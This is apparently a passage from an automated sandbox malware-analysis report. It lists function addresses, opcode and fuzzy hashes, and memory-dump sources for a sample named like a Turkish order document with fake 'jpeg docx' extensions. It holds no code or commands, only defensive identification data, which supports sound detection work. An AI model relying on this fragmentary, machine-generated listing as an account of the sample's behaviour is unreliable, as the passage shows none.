                                                                                                      • Instruction ID: 941ed451ee698dd980e69b10954b6f32bc80b124bf264ef2219bcd4057333ae4
                                                                                                      • Opcode Fuzzy Hash: 22226fabecec1d9d2f516c5289cee6e4e7ce65fe797743ee4ad60a4736145b35
                                                                                                      • Instruction Fuzzy Hash: C9A18C74E01228CFDB65DF24C854BDABBB2BB4A300F1085EAD409A7354DB719E81CF51
                                                                                                      Function 02A1F53D Relevance: .2, Instructions: 155COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 60deb67022ebec342ab0612f545387905bb0069e5cc56861adc0d8c71b61bacc
                                                                                                      • Instruction ID: 214ef16bb17760cbaebd6a0882758572a00379374b9dab1c9a6577f54fb91c76
                                                                                                      • Opcode Fuzzy Hash: 60deb67022ebec342ab0612f545387905bb0069e5cc56861adc0d8c71b61bacc
                                                                                                      • Instruction Fuzzy Hash: 68516574D04398CFDB14EFA8D5857EDBBB2BB49325F108129D805EB698CB359882CF50
                                                                                                      Function 02A1F2D8 Relevance: .2, Instructions: 150COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 49863a7672049db35b5ae741dd127f4bb0ff5113426baaaad39b282044f56f13
                                                                                                      • Instruction ID: 17b6d8419080175d4071f2885b98a7cc710fbcea679d455c58bd4bf20655e782
                                                                                                      • Opcode Fuzzy Hash: 49863a7672049db35b5ae741dd127f4bb0ff5113426baaaad39b282044f56f13
                                                                                                      • Instruction Fuzzy Hash: A0514870D01248DFEB14EFA9C5857EDFBB2BB89324F14C129D800AB698DB759881CF50
                                                                                                      Function 02A1F4C4 Relevance: .1, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f5fcfbfb1d87d108d04e369ea9604799a71a86cbfd3cffab8ebcaef2ff2542a8
                                                                                                      • Instruction ID: b9a119437b9eb7ae16c9031351403c4806d4072c6bda74d326277d4e922ec0c3
                                                                                                      • Opcode Fuzzy Hash: f5fcfbfb1d87d108d04e369ea9604799a71a86cbfd3cffab8ebcaef2ff2542a8
                                                                                                      • Instruction Fuzzy Hash: BD512474D01358CFDB14EFA8D6857EDBBB2BB49325F209129D805EB698CB359882CF50
                                                                                                      Function 051B0853 Relevance: .1, Instructions: 116COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2540781876.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_51b0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 09cdcf3a5743a786f745980c8a640754256752e470702283f95acf53ecd36151
                                                                                                      • Instruction ID: fd879d13aa247daac46ac47e0d83be2ed8ef17dc105d4b35d6b45423d5991849
                                                                                                      • Opcode Fuzzy Hash: 09cdcf3a5743a786f745980c8a640754256752e470702283f95acf53ecd36151
                                                                                                      • Instruction Fuzzy Hash: 85519F74A01228CFDB65DF24C854BAABBB2FB4A301F5085E9D40AA7354DB719E81CF50
                                                                                                      Function 0577B081 Relevance: .1, Instructions: 98COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 350cf9ed353d56f6f666bc58f68ef780a4ef58a4d63aacc4671da8e4bd3dc0d9
                                                                                                      • Instruction ID: ad6a3f9eb0e4be813f0639b94fe02d126714dd763e60de4cc43e95b8e4a1bc3f
                                                                                                      • Opcode Fuzzy Hash: 350cf9ed353d56f6f666bc58f68ef780a4ef58a4d63aacc4671da8e4bd3dc0d9
                                                                                                      • Instruction Fuzzy Hash: A841CEB4D122189FDB04DFA9D598BAEBBF1BF49300F1494A9E414B7390E7389A40CF94
                                                                                                      Function 0577B090 Relevance: .1, Instructions: 93COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2542249851.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_5770000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ab37ec95264ac06eb6494ec31898e5b89bb28539e246039efa9fea767d8b0535
                                                                                                      • Instruction ID: 59b7ec06390762389c6411f9e7e216004a3262fa95ea34c1c998f680e70fd4fc
                                                                                                      • Opcode Fuzzy Hash: ab37ec95264ac06eb6494ec31898e5b89bb28539e246039efa9fea767d8b0535
                                                                                                      • Instruction Fuzzy Hash: 6A41ACB4D122189FDB04DFA9D594BAEBBF1BB49300F1494A9D414B7394E7389A40CF94
                                                                                                      Function 02A12A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Xq$Xq$Xq$Xq
                                                                                                      • API String ID: 0-3965792415
                                                                                                      • Opcode ID: 0b7b15755c0bc546bfe3a32495976ecc5e77854a5f2dfd69fdb87fe940eb1a6b
                                                                                                      • Instruction ID: 3813cf28cc722a53d6a2c3641a3b28bd5b64c88e998acfd4ca0bd8de0d201371
                                                                                                      • Opcode Fuzzy Hash: 0b7b15755c0bc546bfe3a32495976ecc5e77854a5f2dfd69fdb87fe940eb1a6b
                                                                                                      • Instruction Fuzzy Hash: E2315471E043298BEF74DF7989853AFB6B6AB88360F144065C919A7381DF70C985CB92
                                                                                                      Function 02A16920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: \;q$\;q$\;q$\;q
                                                                                                      • API String ID: 0-2933265366
                                                                                                      • Opcode ID: 8e009a61cd2f5b57fd7b1de2023c445f3410abd300df466cf0f1b4604e6f2da1
                                                                                                      • Instruction ID: 1bf2ff96e283ec276ff17b49c4f7185534d060d86ab71e1e2a289fa3596b92d9
                                                                                                      • Opcode Fuzzy Hash: 8e009a61cd2f5b57fd7b1de2023c445f3410abd300df466cf0f1b4604e6f2da1
                                                                                                      • Instruction Fuzzy Hash: B1012C317001158FC7288B2DC584A2573EBAF88A7472982AAE447CB368DE31DC41C791